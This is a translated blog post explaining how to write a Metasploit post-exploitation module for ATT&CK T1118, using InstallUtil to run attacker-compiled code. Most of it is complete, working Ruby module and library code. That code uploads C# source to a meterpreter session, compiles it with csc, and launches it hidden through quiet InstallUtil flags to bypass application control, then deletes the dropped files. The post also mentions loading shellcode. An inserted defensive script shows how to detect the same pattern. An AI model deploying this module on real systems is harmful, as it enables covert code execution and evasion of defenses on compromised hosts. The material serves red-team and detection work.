Tech Share: Writing a Metasploit Post-Exploitation Module for ATT&CK T1118 – by XCTF2017

I. T1118

Adversaries may use InstallUtil to proxy code execution through a trusted Windows utility. InstallUtil is a command-line utility that installs and uninstalls resources by executing the specific installer components specified in a .NET binary. (Reference: MSDN InstallUtil.) InstallUtil is digitally signed by Microsoft and lives in the .NET directories of a Windows system: C:\Windows\Microsoft.NET\Framework\v<version>\InstallUtil.exe and C:\Windows\Microsoft.NET\Framework64\v<version>\InstallUtil.exe. Because it executes whatever class in the binary is decorated with the [System.ComponentModel.RunInstaller(true)] attribute, InstallUtil can also be used to bypass application control.

II. T1118 POC

Invoking the HelpText method through InstallUtil

[Image 1]

Step 1:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library T1118.cs

Step 2:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /U /logfile= /logtoconsole=false T1118.dll

HelpText invocation:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /? T1118.dll
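As an added defensive example (not code from the original post, and not part of Metasploit), the following Ruby script shows what the T1118 behaviour summarised in section I and exercised by the two POC commands above looks like from the detection side. It parses constructed process-creation events (the key=value line format, the field names, which are modelled loosely on Sysmon Event ID 1, the host names and the sample command lines are all assumptions) and flags InstallUtil.exe runs that combine /U with suppressed logging (/logfile= and /logtoconsole=false), that load an assembly from a user-writable directory, or that follow a csc.exe compile from such a directory on the same host within a short window. The list of user-writable directories and the 300-second correlation window are assumptions as well.

```ruby
# Added example: detection logic for the T1118 InstallUtil proxy-execution
# pattern. Not part of the original post. Event format, field names, hosts,
# command lines, writable-directory list and time window are all constructed
# assumptions for illustration.
require 'time'

Event = Struct.new(:time, :host, :image, :command_line, :parent_image)

# Flags the POC combines to run an assembly's uninstall path with no log output.
QUIET_FLAGS = [
  /(?:^|\s)\/u(?:\s|$)/i,     # /U  (run the Uninstall method)
  /\/logfile=(?:\s|$)/i,      # /logfile= with an empty value: no log file
  /\/logtoconsole=false\b/i,  # /LogToConsole=false
].freeze

# Assumed user-writable locations where a dropped source file or DLL would land.
WRITABLE_DIRS = [
  /\\windows\\temp\\/i,
  /\\users\\[^\\]+\\appdata\\/i,
  /\\programdata\\/i,
].freeze

# Last path component, lower-cased. File.basename is avoided on purpose: on a
# non-Windows analysis host it does not treat backslashes as separators.
def exe_name(path)
  path.to_s.split(/[\\\/]/).last.to_s.downcase
end

# Parse one constructed 'Key=value Key2="quoted value"' line into an Event.
def parse_event(line)
  fields = {}
  line.scan(/(\w+)=(?:"([^"]*)"|(\S+))/) { |k, quoted, bare| fields[k] = quoted || bare }
  Event.new(Time.parse(fields['UtcTime']), fields['Computer'], fields['Image'],
            fields['CommandLine'].to_s, fields['ParentImage'])
end

def quiet_installutil?(ev)
  exe_name(ev.image) == 'installutil.exe' && QUIET_FLAGS.all? { |re| ev.command_line.match?(re) }
end

def touches_writable_dir?(ev)
  WRITABLE_DIRS.any? { |re| ev.command_line.match?(re) }
end

def csc_from_writable?(ev)
  exe_name(ev.image) == 'csc.exe' && touches_writable_dir?(ev)
end

# Walk events in time order and return one finding per suspicious InstallUtil run.
def detect(events, window_secs = 300)
  findings = []
  csc_times = Hash.new { |h, k| h[k] = [] }  # host => times of csc.exe compiles from writable dirs
  events.sort_by(&:time).each do |ev|
    csc_times[ev.host] << ev.time if csc_from_writable?(ev)
    next unless exe_name(ev.image) == 'installutil.exe'

    reasons = []
    reasons << 'uninstall with logging suppressed (/U /logfile= /logtoconsole=false)' if quiet_installutil?(ev)
    reasons << 'assembly path in a user-writable directory' if touches_writable_dir?(ev)
    if csc_times[ev.host].any? { |t| (ev.time - t).between?(0, window_secs) }
      reasons << "preceded by a csc.exe compile from a writable directory within #{window_secs}s"
    end
    next if reasons.empty?

    severity = { 1 => 'medium', 2 => 'high' }.fetch(reasons.size, 'critical')
    findings << { host: ev.host, time: ev.time, severity: severity,
                  parent: ev.parent_image, command_line: ev.command_line, reasons: reasons }
  end
  findings
end

# Constructed sample events: the POC sequence on WS01, a vendor installer on
# WS02, and a quiet uninstall from Program Files on WS03.
SAMPLE_LOG = <<~'LOG'
  UtcTime="2020-11-26T08:30:01Z" Computer=WS01 Image="C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" CommandLine="C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:C:\windows\temp\t1118.dll C:\windows\temp\t1118.tmp" ParentImage="C:\Windows\System32\cmd.exe"
  UtcTime="2020-11-26T08:30:04Z" Computer=WS01 Image="C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" CommandLine="C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\windows\temp\t1118.dll" ParentImage="C:\Windows\System32\cmd.exe"
  UtcTime="2020-11-26T09:00:00Z" Computer=WS02 Image="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe" CommandLine="InstallUtil.exe C:\Program Files\Vendor\Service.exe" ParentImage="C:\Program Files\Vendor\setup.exe"
  UtcTime="2020-11-26T10:15:00Z" Computer=WS03 Image="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe" CommandLine="InstallUtil.exe /logfile= /logtoconsole=false /U C:\Program Files\Vendor\Service.exe" ParentImage="C:\Program Files\Vendor\uninstall.exe"
LOG

def run_sample
  detect(SAMPLE_LOG.lines.map(&:strip).reject(&:empty?).map { |l| parse_event(l) })
end

if __FILE__ == $PROGRAM_NAME
  run_sample.each do |f|
    puts "[#{f[:severity].upcase}] #{f[:host]} #{f[:time].utc.iso8601} parent=#{f[:parent]}"
    f[:reasons].each { |r| puts "    - #{r}" }
  end
end
```

On the constructed sample the WS01 sequence (csc.exe compiling from C:\windows\temp, then a quiet InstallUtil /U of the DLL from the same directory three seconds later) scores critical, the WS03 quiet uninstall from Program Files scores medium for an analyst to triage, and the plain vendor install on WS02 produces nothing. The three signals are kept separate so that each can be tuned on its own: the quiet-flag combination is the strongest single indicator, while the writable-directory and csc.exe correlations catch variants that drop the /logfile= trick.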

[Image 2]

III. Writing the module

Approach: since T1118 belongs to the post-exploitation phase, the module performs the following steps once a session has been obtained

1. Upload the source code

2. Compile the DLL with csc

3. Invoke InstallUtil.exe to load the DLL

Options that need to be defined:

1. The local C# source file

2. The upload path on Windows

3. The .NET version

Create a new folder under /usr/share/metasploit-framework/modules/post/windows/ and under /usr/share/metasploit-framework/data/ (named tianyu in this article) to hold the ATT&CK-related attack modules. Then create a new Ruby file in it named t1118.rb.

[Image 3]
[Image 4]

1. Initializing the module

Refer to the official guide on writing post modules: https://github.com/rapid7/metasploit-framework/wiki/How-to-get-started-with-writing-a-post-module

Define the initial info metadata

[Image 5]

Set the options

OptString.new('RFILE', [false, '上传到windows路径', 'C:\\windows\\temp\\t1118.tmp']),
OptString.new('LFILE', [true, '本地t1118.cs路径', ::File.join(Msf::Config.install_root, "data", "tianyu", "t1118", "t1118.cs")]),
OptBool.new('CLEANUP_FILE', [true, "清理文件", true]),
OptString.new('DOTNET_VERSION', [true, 'DotNet Version', 'v4.0.30319']),

Define what the run command executes.

def run
  begin
    return 0 if session.type != "meterpreter"
    print_good("模块T1118执行成功")
  rescue ::Exception => e
    print_status("Unable to execute: #{e.message}")
    print_error("模块T1118执行失败")
    return
  end
end

2. Defining the local file and the upload file

Define remote_file and local_file, which read datastore['RFILE'] and datastore['LFILE']

def remote_file
  if datastore['RFILE'].blank?
    remote_name = File.basename(datastore['LFILE'])
  else
    remote_name = datastore['RFILE']
  end
  remote_name
end

def local_file
  datastore['LFILE']
end

3. Deleting the uploaded source code

def clean_file
  print_status("Removing files...")
  # Register the uploaded source for cleanup. remote_file (not the raw RFILE
  # option) is used so the fallback name chosen when RFILE is blank is removed
  # too; the compiled DLL written by run is registered as well.
  register_file_for_cleanup(remote_file)
  register_file_for_cleanup('C:\\windows\\temp\\t1118.dll')
end

4. Defining the CMD command

Use run_cmd to run commands

def run_cmd(user_cmd, io=true)
  cmd = "cmd /c #{user_cmd}"
  begin
    print_status("Executing '#{cmd}' on #{session.inspect}")
    if io
      # Synchronous: run the command and show its output
      res = cmd_exec(cmd)
      if res
        print_warning(res)
      end
    else
      # Asynchronous: launch the process hidden and do not wait for output
      res = session.sys.process.execute(cmd, nil, {'Hidden' => true})
    end
  rescue ::Exception => e
    print_error("Unable to execute: #{e.message}")
    return
  end
end

5. Uploading the file and executing commands

This step consists of the following:

1) Upload the local file /usr/share/metasploit-framework/data/tianyu/t1118/t1118.cs to C:\windows\temp\t1118.tmp

2) Compile t1118.tmp with csc.exe

3) Invoke the compiled DLL with InstallUtil

4) Delete the source file

def run
  begin
    return 0 if session.type != "meterpreter"
    rfile = remote_file()
    lfile = local_file()
    dotnet_version = datastore['DOTNET_VERSION']
    base = 'C:\Windows\Microsoft.NET\Framework'
    csc = base + '\\' + dotnet_version + '\\' + 'csc.exe'
    installutil = base + '\\' + dotnet_version + '\\' + 'installutil.exe'
    upload_file(rfile, lfile)
    # Equivalent to: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library T1118.cs
    # /target:library is required so that csc emits a DLL instead of an exe
    cmd = %Q(#{csc} /target:library /out:C:\\windows\\temp\\t1118.dll #{rfile})
    print_status("Compiling...")
    run_cmd(cmd)
    sleep(2)
    # Equivalent to: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /U /logfile= /logtoconsole=false T1118.dll
    cmd = %Q(#{installutil} /logfile= /LogToConsole=false /U C:\\windows\\temp\\t1118.dll)
    print_status("Executing InstallUtil...")
    run_cmd(cmd, false)
    print_good("模块T1118执行成功")
    sleep(2)
    # Only remove the dropped files when the CLEANUP_FILE option is set
    if datastore['CLEANUP_FILE']
      clean_file()
      print_good("清理缓存成功")
    end
  rescue ::Exception => e
    print_status("Unable to execute: #{e.message}")
    print_error("模块T1118执行失败")
    return
  end
end

Initial settings after loading the complete t1118 module

[Image 6]

After the POC runs

[Image 7]

After the POC runs with shellcode filled in

[Image 8]
[Image 9]

Demo

[Image 10]

IV. Complete code

Add the library require to /usr/share/metasploit-framework/lib/msf/core/post/windows.rb

require 'msf/core/post/windows/tianyu'

Define the library file /usr/share/metasploit-framework/lib/msf/core/post/windows/tianyu.rb

# -*- coding: binary -*-
module Msf
class Post
module Windows
module Tianyu

  # Upload target file
  def remote_file
    if datastore['RFILE'].blank?
      remote_name = File.basename(datastore['LFILE'])
    else
      remote_name = datastore['RFILE']
    end
    remote_name
  end

  # Local file
  def local_file
    datastore['LFILE']
  end

  # Clean up files: the uploaded source (via remote_file, so the fallback name
  # used when RFILE is blank is covered) and the compiled DLL written by run
  def clean_file
    print_status("Removing files...")
    register_file_for_cleanup(remote_file)
    register_file_for_cleanup('C:\\windows\\temp\\t1118.dll')
  end

  # Run a cmd command; io=true waits for and prints the output,
  # io=false launches the process hidden without waiting
  def run_cmd(user_cmd, io=true)
    cmd = "cmd /c #{user_cmd}"
    begin
      print_status("Executing '#{cmd}' on #{session.inspect}")
      if io
        res = cmd_exec(cmd)
        if res
          print_warning(res)
        end
      else
        res = session.sys.process.execute(cmd, nil, {'Hidden' => true})
      end
    rescue ::Exception => e
      print_error("Unable to execute: #{e.message}")
      return
    end
  end

end # Tianyu
end # Windows
end # Post
end # Msf

Module file /usr/share/metasploit-framework/modules/post/windows/tianyu/t1118.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Exploit::FileDropper
  include Post::Windows::Tianyu

  def initialize(info={})
    super(update_info(info,
      'Name'          => 'InstallUtil (T1118) Windows',
      'Description'   => %q{ATT&CK 模块编写 T1118},
      'License'       => MSF_LICENSE,
      'Author'        => [ '天虞实验室-demon' ],
      'References'    => [
        [ 'URL', 'https://attack.mitre.org/wiki/Technique/T1118' ],
        [ 'URL', 'https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1118' ],
        [ 'URL', 'https://gist.github.com/lithackr/b692378825e15bfad42f78756a5a3260' ],
        [ 'URL', 'https://github.com/praetorian-code/purple-team-attack-automation/blob/master/modules/post/windows/purple/t1118.rb' ]
      ],
      'Platform'      => [ 'win' ],
      'SessionTypes'  => [ 'meterpreter' ]
    ))
    register_options([
      OptString.new('RFILE', [false, '上传到windows路径', 'C:\\windows\\temp\\t1118.tmp']),
      OptString.new('LFILE', [true, '本地t1118.cs路径', ::File.join(Msf::Config.install_root, "data", "tianyu", "t1118", "t1118.cs")]),
      OptBool.new('CLEANUP_FILE', [true, "清理文件", true]),
      OptString.new('DOTNET_VERSION', [true, 'DotNet Version', 'v4.0.30319']),
    ])
  end

  def run
    begin
      return 0 if session.type != "meterpreter"
      rfile = remote_file()
      lfile = local_file()
      dotnet_version = datastore['DOTNET_VERSION']
      base = 'C:\Windows\Microsoft.NET\Framework'
      csc = base + '\\' + dotnet_version + '\\' + 'csc.exe'
      installutil = base + '\\' + dotnet_version + '\\' + 'installutil.exe'
      upload_file(rfile, lfile)
      # /target:library is required so that csc emits a DLL instead of an exe
      cmd = %Q(#{csc} /target:library /out:C:\\windows\\temp\\t1118.dll #{rfile})
      print_status("Compiling...")
      run_cmd(cmd)
      sleep(2)
      cmd = %Q(#{installutil} /logfile= /LogToConsole=false /U C:\\windows\\temp\\t1118.dll)
      print_status("Executing InstallUtil...")
      run_cmd(cmd, false)
      print_good("模块T1118执行成功")
      sleep(2)
      # Only remove the dropped files when the CLEANUP_FILE option is set
      if datastore['CLEANUP_FILE']
        clean_file()
        print_good("清理缓存成功")
      end
    rescue ::Exception => e
      print_status("Unable to execute: #{e.message}")
      print_error("模块T1118执行失败")
      return
    end
  end
end

Cobalt Strike follows the same approach and the same style of script; below is a demonstration of the script I have already written

[Image 11]

Source: freebuf.com 2020-11-26 16:36:46 by: XCTF2017
